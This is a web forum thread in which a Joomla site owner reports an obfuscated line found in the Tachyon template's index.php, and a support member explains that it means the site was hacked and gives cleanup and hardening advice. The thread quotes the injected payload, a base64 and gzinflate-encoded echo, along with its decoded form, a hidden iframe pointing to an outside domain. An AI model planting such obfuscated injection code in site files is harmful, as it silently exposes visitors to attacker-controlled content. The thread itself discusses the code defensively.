Malware In Tachyon Somehow
-
-
- Dom2012
- Jr. Rocketeer
- Posts: 39
- Thanks: 0
-
Hi,
While exploring the cause of a problem in another third party component, another company found some code in Tachyon's index.php file.
I don't believe for one second that Rockettheme put it there but what I cannot figure out how it is there.
Here's what they found/said:-
/templates/rt_tachyon_j16/index.php line 19
?
1
echo(gzinflate(base64_decode("3Y5BDsIgEEX3TXoHMpvqpkQXLhTwEl4AKYUxFBo6tXp7qfUUzurn5/0/n7H/ODGZjCMxeo9WAtkX8Yd+6s0FVVddMvNgI7VLRrK7RmCf9WDZlI0ETzSeOd/oKeCA1GLsE8fYGofXwwlYLLSE24JENgMrbAoBo5OgZ0rAvnX3lDubJcRi6IAuSjDl6RrwFp0nCUdgC3bkV6UE32aoZn+pK/FboD4=")));
This line of code is translated into a script tag:
?
1
<script type="text/javascript">document.write('<iframe src="/<a href=" scriptslimit.info/in.cgi?16 " "=""> scriptslimit.info/in.cgi?16 "</a> name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script>
They could not find any evidence that another component/plugin had injected it, but that seems the most likely case to me. I wondered if anyone here could somehow help me track down the cause so that I can 'expose' the culprit who made this happen.
Thanks.
-
-
-
- Cliff Pfeifer
- Preeminent Rocketeer
- Posts: 8444
- Thanks: 20
- Website Developer
-
Sorry for the trouble, basically you got hacked. The code itself doesn't tell you much other than someone got into your site and placed it there. This is a pretty common hacker technique, they get into your files, usually through an outdated plugin or old version of Joomla, and place code on the index file of your theme to redirect or take over your site completely. This seems pretty tame compared to a few others I've come across to be honest, but it's something to be concerned about.
You can patch this up right away by uploading a fresh copy of the index.php file from the theme download, but you have a security issue - and that's the problem you need to fix. I would check server logs for around the time you started having issues, to see if you can determine how they got in - look for modified files, any unauthorized FTP activity. It might indicate which files they used to get access. Make sure you are using the most recent versions of all plugins, extensions and most importantly Joomla.
Keep an eye on it, they'll usually strike again if you don't fix the hole in your security. And even if you do, they might try to find another way in. Hackers are persistent. If it continues to be an issue, look into Akeeba Admin Tools for extra security measure, that usually stops it. Outdated software is the most frequent cause of this so keep everything up to date as much as possible. - The difficult we do immediately, the impossible takes a little longer.
-
-
-
- Dom2012
- Jr. Rocketeer
- Posts: 39
- Thanks: 0
-
Thanks for your reply, Cliff.
I did as you suggested and the site works fine now.
I was a bit surprised by this because I have OSE Anti hacker installed. I thought it was meant to prevent something like this.
It looks like I need to do some homework so this won't happen again.
If you've any tips about reading material, I'd be pleased to know.
Many thanks,
Dom
-
-
-
- Cliff Pfeifer
- Preeminent Rocketeer
- Posts: 8444
- Thanks: 20
- Website Developer
-
Honestly, I only know about it because it's happened to me a bunch of times, some of mine were exactly like yours, others were far worse. I went back and forth with a hacker for for a few months on a clients site before I finally figured out what the cause was - outdated plugin - then locked everything down tight so it wouldn't happen again.
It's really just about keeping everything up to date - especially Joomla, minimize the number of plugins you use if possible, as each one is a security risk if not kept updated. Outdated software is the number one cause of hacking. You just can't give them an easy way in.
I can't recommend Akeeba Admin Tools enough. There is a free version that works great for locking down your admin area, the paid version is very cheap (a couple bucks) and it allows you to prevent these types of minor attacks and more serious threats. Since I started using that, I haven't had one issue. - The difficult we do immediately, the impossible takes a little longer.
-
Time to create page: 0.074 seconds